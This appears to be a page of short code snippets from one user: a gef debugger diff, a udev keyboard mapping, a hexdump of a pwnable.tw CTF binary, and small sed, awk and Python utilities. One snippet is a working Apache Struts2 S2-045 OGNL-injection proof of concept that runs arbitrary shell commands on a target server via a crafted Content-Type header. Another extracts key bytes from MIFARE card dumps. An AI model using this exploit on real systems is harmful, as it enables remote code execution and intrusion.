OwenChia

diff --git a/gef.py b/gef.py
index 13e26eb..2f189eb 100644
--- a/gef.py
+++ b/gef.py
@@ -1160,6 +1160,7 @@ def capstone_disassemble(location, nb_insn, **kwargs):
     capstone    = sys.modules["capstone"]
     arch, mode  = get_capstone_arch(arch=kwargs.get("arch", None), mode=kwargs.get("mode", None), endian=kwargs.get("endian", None))
     cs          = capstone.Cs(arch, mode)
+    cs.syntax   = capstone.CS_OPT_SYNTAX_ATT
     cs.detail   = True

OwenChia

# TerransForce S4 - http://www.terransforce.com/?product_info/S4-1060-67T.html
# Usage:
# put this content to /etc/udev/hwdb.d/70-keyboard.hwdb, and then
# > systemd-hwdb update 
# > udevadm trigger /dev/input/event5 
#
evdev:atkbd:dmi:bvn*:bvr*:bd*:svnTerransForce:pnTerransForceS4:pvr*
 KEYBOARD_KEY_e4=f21                                    # Touchpad
 KEYBOARD_KEY_f7=brightnessdown                         # Fn+F4
 KEYBOARD_KEY_f8=brightnessup                           # Fn+F5

OwenChia

题目是 pwnable.tw 上的一个， start[0]
 
使用 hexdump -Cv start 得到如下输出：
 
00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|         
00000010  02 00 03 00 01 00 00 00  60 80 04 08 34 00 00 00  |........`...4...|         
00000020  6c 01 00 00 00 00 00 00  34 00 20 00 01 00 28 00  |l.......4. ...(.|         
00000030  05 00 02 00 01 00 00 00  00 00 00 00 00 80 04 08  |................|         
00000040  00 80 04 08 a3 00 00 00  a3 00 00 00 05 00 00 00  |................|         
00000050  00 10 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|         

OwenChia

import argparse

from capstone import (
    Cs,
    CS_ARCH_X86,
    CS_MODE_32,
    CS_OPT_SYNTAX_ATT,
)

OwenChia

#! /usr/bin/env hy


(import argparse)
(import lzma)
;; (import [pathlib [Path]])
(import [string [printable]])


;; 36 for [0-9a-z]

OwenChia

#! /bin/sed -nf

# Usage: 
#   ip addr | sed -nf getip.sed | column -t

/^[[:digit:]]/ {
	: begin
	s/^[[:digit:]]\+: \([[:graph:]]\+\).*/\1/
	h
	: loop

OwenChia

# determine local IP address
getip ()
{
  ip addr | awk '/inet/ && ! /scope host/ {print $2}'
}

OwenChia

# Usage:
#   source /path/to/s2-045.sh
#   poc_s2-045 uri [command] 
poc_s2-045 () { curl --insecure $1 -H "Content-Type:%{(#enctype='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='${2-whoami}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" }

OwenChia

#Usage:
#  source /path/to/exf.sh
#  exf /path/to/m1.mfd
#
#How to remove?
#  unset -f exf
#or u can use unfunction in zsh:
#  unfunction exf
exf () {(xxd $1 | awk '/[37bf]0:/ && NR <= 64 {print $2 $3 $4, $7 $8 $9}')};

OwenChia

# -*- coding: utf-8 -*-
from functools import reduce
from urllib import request
import argparse
import json


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("topic", type=int, nargs='?', default=293899)